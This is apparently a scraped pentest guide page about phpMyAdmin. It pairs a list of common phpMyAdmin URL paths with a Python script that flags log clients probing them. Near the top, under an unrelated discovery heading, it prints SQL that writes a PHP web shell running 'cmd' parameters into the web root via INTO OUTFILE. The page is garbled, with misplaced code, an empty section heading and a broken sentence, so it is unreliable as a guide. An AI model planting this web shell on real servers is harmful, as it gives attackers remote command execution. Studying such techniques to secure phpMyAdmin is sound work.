Phpmyadmin | Hacktricks
If your authenticated DB user has administrative privileges (like root), you can attempt to write files directly to the web directory.
Following the tactical spirit of , this comprehensive guide details the precise methodologies used during penetration tests to discover, exploit, and secure phpMyAdmin instances.

1. Information Gathering and Endpoint Discovery
CREATE DATABASE temp;
USE temp;
CREATE TABLE shell (data TEXT);
INSERT INTO shell VALUES ('<?php system($_GET["cmd"]); ?>');
SELECT data INTO OUTFILE '/var/www/html/shell.php' FROM shell;
Administrators often leave phpMyAdmin on predictable directories. Security professionals use fuzzing tools like gobuster, dirsearch, or ffuf to scan for common endpoints:

/phpmyadmin/
/pma/
/admin/pma/
/mysql/
/phpMyAdmin/
/dbadmin/

Version Fingerprinting
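Enumeration of the endpoint list above leaves a recognisable pattern in web server access logs: one client requesting several of these directories in quick succession. The following is an added example, not part of the original page, that flags such clients and reports which probed locations actually answered; the function name, the threshold, the Combined Log Format assumption and the sample log lines are all constructed for illustration.

```python
import re
from collections import defaultdict

# Common phpMyAdmin locations listed on this page (compared case-insensitively).
PMA_PATHS = {"/phpmyadmin", "/pma", "/admin/pma", "/mysql", "/dbadmin"}

# Assumed input: Combined Log Format. Captures client IP, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def find_pma_probes(lines, min_paths=3):
    """Return {ip: {"probed": [...], "reachable": [...]}} for every client that
    requested at least `min_paths` distinct phpMyAdmin locations."""
    probed = defaultdict(set)
    reachable = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed or non-HTTP entries
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        # Drop the query string and trailing slash, normalise case.
        path = target.split("?", 1)[0].rstrip("/").lower()
        # Match the directory itself or anything beneath it.
        hit = next((p for p in PMA_PATHS if path == p or path.startswith(p + "/")), None)
        if hit is None:
            continue
        probed[ip].add(hit)
        # Success, redirect or an auth challenge means something is deployed there.
        if status < 400 or status in (401, 403):
            reachable[ip].add(hit)
    return {ip: {"probed": sorted(paths), "reachable": sorted(reachable[ip])}
            for ip, paths in probed.items() if len(paths) >= min_paths}

# Constructed sample log lines (documentation-range IP addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 153 "-" "scanner"
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /pma/ HTTP/1.1" 404 153 "-" "scanner"
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /admin/pma/ HTTP/1.1" 404 153 "-" "scanner"
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /dbadmin/ HTTP/1.1" 200 4821 "-" "scanner"
198.51.100.20 - - [10/Mar/2024:10:05:00 +0000] "GET /dbadmin/index.php?route=/ HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2024:10:05:09 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, info in find_pma_probes(SAMPLE_LOG).items():
        print(ip, "probed", info["probed"], "reachable", info["reachable"])
```

A non-empty "reachable" list for a flagged client means the instance was found and should be moved behind an IP allowlist or VPN, or given an additional authentication layer.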
